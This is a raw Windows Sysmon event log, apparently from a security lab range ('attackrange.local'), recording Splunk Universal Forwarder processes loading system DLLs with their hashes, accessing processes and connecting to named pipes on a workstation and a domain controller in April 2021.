Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001531134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001531133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x80000000000000001531128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.657{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531126Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.658{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531125Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531124Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531123Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531122Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531121Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001531119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.306{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001531118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.306{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA1253FAC9FB4E532E86A73D406FD293,SHA256=C4AB2845DB15AEA4F9BDD5DCFEC8E4FC9F0DF58C2605C948B9AAECC64675DD55falsefalse - insufficient disk space 11241100x80000000000000001531117Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.172{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001531116Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.172{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E593D5F7104149D4348EFE0C2551E8,SHA256=D3A97C02C12C0E79E5F763F9DC3B38F67F10BD7E7484EC2EE751FFB96AD9AEEAfalsefalse - insufficient disk space 534500x80000000000000001531115Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001531114Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001531113Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}81721860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531112Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531111Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x80000000000000001061190Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:32.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061189Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:32.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001531110Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.040{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001531109Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.040{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D6B082D128AB134CFBC22781DBE31D,SHA256=55DC42D583E337A299F95AC73F6AFF33C1553F4A159A4B9FD9DCDB04707A9F8Efalsefalse - insufficient disk space 734700x80000000000000001531108Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531107Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531106Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531105Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001531104Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531103Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001531102Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 23542300x80000000000000001061194Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:33.207{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7144B330B0D76E57DA9AAEC3A13433B,SHA256=64D363F193CE857E9FB770C636C40A493A2F62452EDCABCAE71B581B218DC92B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001531238Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.660{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001531237Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.660{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B85353CB8F575E768CDA34F83036305,SHA256=36D2D365F7575954265CB58EE935DA3AA00C558CD72B18026567EED9EE23BCAFfalsefalse - insufficient disk space 534500x80000000000000001531236Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001531235Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001531234Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531233Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x80000000000000001531232Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001531231Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90ADFF1CE9414F339ED26B95533E1035,SHA256=16360B23417E323FF25973642DD35D6B88571F7024FBE3951AC7C62ECF030859falsefalse - insufficient disk space 734700x80000000000000001531230Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531229Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531228Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531227Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001531226Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531225Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001531224Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531223Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531222Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 